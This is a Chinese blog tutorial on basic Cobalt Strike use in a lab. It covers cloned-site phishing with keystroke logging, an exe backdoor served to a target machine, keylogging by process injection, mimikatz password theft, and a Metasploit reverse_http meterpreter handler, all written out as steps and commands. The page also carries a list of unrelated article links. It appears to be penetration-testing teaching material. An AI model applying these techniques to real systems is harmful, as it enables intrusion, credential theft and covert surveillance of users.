『渗透基础』Cobalt Strike基础使用入门_Cobalt Strike联动msfconsole

2024-02-08 17:10

本文主要是介绍『渗透基础』Cobalt Strike基础使用入门_Cobalt Strike联动msfconsole,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

文章目录

  • 环境
  • 配置cs
    • 启动cs服务器
    • 登录客户端
  • 网页钓鱼
  • 靶机渗透
    • 创建Listener
    • 生成后门
    • 靶机上线
      • *python文件服务器
      • cs自带文件服务器
    • 修改sleep时间
    • 读取目录
    • 进程注入记录键盘输入
    • 截图
    • mimikatz获取密码
  • Cobalt Strike联动msfconsole
  • 插件安装
  • 参考

本实验在安全隔离环境中运行
仅供教学使用

环境

  • kali:Cobalt Strike4.3,192.168.225.129
  • winxp:192.168.225.130

配置cs

启动cs服务器

首先给cs文件夹权限

chmod -R 777 ./cobaltstrike4.3  

启动cs服务器,teamserver ip password,自定义密码,ip填公网/局域网,不可填127.0.0.1

在这里插入图片描述
默认端口50050

登录客户端

sh ./start.sh

这里由于直接在服务器上面开客户端,所以可以填127.0.0.1,最好还是填局域网IP

在这里插入图片描述

网页钓鱼

选择克隆网站

在这里插入图片描述
克隆目标网站作为钓鱼,勾选记录键盘

在这里插入图片描述
靶机访问并输入文字

在这里插入图片描述
即可截获输入内容

在这里插入图片描述

靶机渗透

创建Listener

先创建监听器

在这里插入图片描述
add一个http监听器,host选择客户端ip

Beacon为内置的Listener,获取shell到CS上,Foreign为外部结合的Listener,常用于MSF的结合

在这里插入图片描述
创建成功

在这里插入图片描述

生成后门

攻击package有四种

在这里插入图片描述

  1. hta
  2. office宏
  3. 自定义payload
  4. exe

演示选择exe,配置对应监听器,然后创建32位的exe

在这里插入图片描述
保存到桌面即可

在这里插入图片描述

如果是hta,运行mshta URL即可

靶机上线

这一步模拟受害者下载恶意exe

*python文件服务器

在桌面运行

python3 -m http.server 8010

在这里插入图片描述
靶机访问,点击运行

在这里插入图片描述
即可触发cs上线

cs自带文件服务器

方便一点,选择文件服务器钓鱼

在这里插入图片描述

选中生成的后门,然后修改一个名字
在这里插入图片描述
靶机访问url,点击运行

在这里插入图片描述
触发cs上线

在这里插入图片描述

修改sleep时间

默认60秒靶机向服务端发包告知存活情况,为了是隐藏自己,并获取一次需要执行的命令,执行渗透要把这个时间缩短才能很好地拿到回显

在这里插入图片描述
改小一点就行,演示改成1s

在这里插入图片描述

读取目录

在这里插入图片描述

在这里插入图片描述

进程注入记录键盘输入

靶机开启一个浏览器

在这里插入图片描述
cs浏览进程

在这里插入图片描述
注入explore.exe,并点击log ketstrokes记录键盘

在这里插入图片描述

注入成功后会有新的进程上线,还是跟上面一样别忘了上线后把sleep调小

在这里插入图片描述

靶机在浏览器输入字符,cs键盘记录窗口收到输入的字符

在这里插入图片描述

截图

在这里插入图片描述
打开截图窗口即可看到

在这里插入图片描述

mimikatz获取密码

在这里插入图片描述

Cobalt Strike联动msfconsole

首先保证cs上线

在这里插入图片描述
创建一个foreign http监听器,ip填公网/局域网,端口弄一个不常用的

在这里插入图片描述
然后cs客户端启动msf,这里ip可以填127

msfconsole
use exploit/multi/handler
set lhost 127.0.0.1
set lport 5555
set payload windows/meterpreter/reverse_http
exploit

相当于靶机的请求通过监听器传到了msf

在这里插入图片描述

配置靶机生成请求

在这里插入图片描述
选择msf的监听器

在这里插入图片描述
等一下即可

在这里插入图片描述

插件安装

用梼杌的插件,解压后load cna文件
在这里插入图片描述
邮件上线机器即可

在这里插入图片描述

参考

https://www.freebuf.com/company-information/167460.html
https://github.com/DeEpinGh0st/Erebus
https://github.com/pandasec888/taowu-cobalt-strike

欢迎关注我的CSDN博客 :@Ho1aAs
版权属于:Ho1aAs
本文链接:https://blog.csdn.net/Xxy605/article/details/125388547
版权声明:本文为原创,转载时须注明出处及本声明

这篇关于『渗透基础』Cobalt Strike基础使用入门_Cobalt Strike联动msfconsole的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/691669

相关文章

Python并行处理实战之如何使用ProcessPoolExecutor加速计算

《Python并行处理实战之如何使用ProcessPoolExecutor加速计算》Python提供了多种并行处理的方式,其中concurrent.futures模块的ProcessPoolExecu... 目录简介完整代码示例代码解释1. 导入必要的模块2. 定义处理函数3. 主函数4. 生成数字列表5.

Python中help()和dir()函数的使用

《Python中help()和dir()函数的使用》我们经常需要查看某个对象(如模块、类、函数等)的属性和方法,Python提供了两个内置函数help()和dir(),它们可以帮助我们快速了解代... 目录1. 引言2. help() 函数2.1 作用2.2 使用方法2.3 示例(1) 查看内置函数的帮助(

Linux脚本(shell)的使用方式

《Linux脚本(shell)的使用方式》:本文主要介绍Linux脚本(shell)的使用方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录概述语法详解数学运算表达式Shell变量变量分类环境变量Shell内部变量自定义变量:定义、赋值自定义变量:引用、修改、删

Java使用HttpClient实现图片下载与本地保存功能

《Java使用HttpClient实现图片下载与本地保存功能》在当今数字化时代,网络资源的获取与处理已成为软件开发中的常见需求,其中,图片作为网络上最常见的资源之一,其下载与保存功能在许多应用场景中都... 目录引言一、Apache HttpClient简介二、技术栈与环境准备三、实现图片下载与保存功能1.

Python中使用uv创建环境及原理举例详解

《Python中使用uv创建环境及原理举例详解》uv是Astral团队开发的高性能Python工具,整合包管理、虚拟环境、Python版本控制等功能,:本文主要介绍Python中使用uv创建环境及... 目录一、uv工具简介核心特点:二、安装uv1. 通过pip安装2. 通过脚本安装验证安装:配置镜像源(可

LiteFlow轻量级工作流引擎使用示例详解

《LiteFlow轻量级工作流引擎使用示例详解》:本文主要介绍LiteFlow是一个灵活、简洁且轻量的工作流引擎,适合用于中小型项目和微服务架构中的流程编排,本文给大家介绍LiteFlow轻量级工... 目录1. LiteFlow 主要特点2. 工作流定义方式3. LiteFlow 流程示例4. LiteF

使用Python开发一个现代化屏幕取色器

《使用Python开发一个现代化屏幕取色器》在UI设计、网页开发等场景中,颜色拾取是高频需求,:本文主要介绍如何使用Python开发一个现代化屏幕取色器,有需要的小伙伴可以参考一下... 目录一、项目概述二、核心功能解析2.1 实时颜色追踪2.2 智能颜色显示三、效果展示四、实现步骤详解4.1 环境配置4.

使用jenv工具管理多个JDK版本的方法步骤

《使用jenv工具管理多个JDK版本的方法步骤》jenv是一个开源的Java环境管理工具,旨在帮助开发者在同一台机器上轻松管理和切换多个Java版本,:本文主要介绍使用jenv工具管理多个JD... 目录一、jenv到底是干啥的?二、jenv的核心功能(一)管理多个Java版本(二)支持插件扩展(三)环境隔

SQL中JOIN操作的条件使用总结与实践

《SQL中JOIN操作的条件使用总结与实践》在SQL查询中,JOIN操作是多表关联的核心工具,本文将从原理,场景和最佳实践三个方面总结JOIN条件的使用规则,希望可以帮助开发者精准控制查询逻辑... 目录一、ON与WHERE的本质区别二、场景化条件使用规则三、最佳实践建议1.优先使用ON条件2.WHERE用

Java中Map.Entry()含义及方法使用代码

《Java中Map.Entry()含义及方法使用代码》:本文主要介绍Java中Map.Entry()含义及方法使用的相关资料,Map.Entry是Java中Map的静态内部接口,用于表示键值对,其... 目录前言 Map.Entry作用核心方法常见使用场景1. 遍历 Map 的所有键值对2. 直接修改 Ma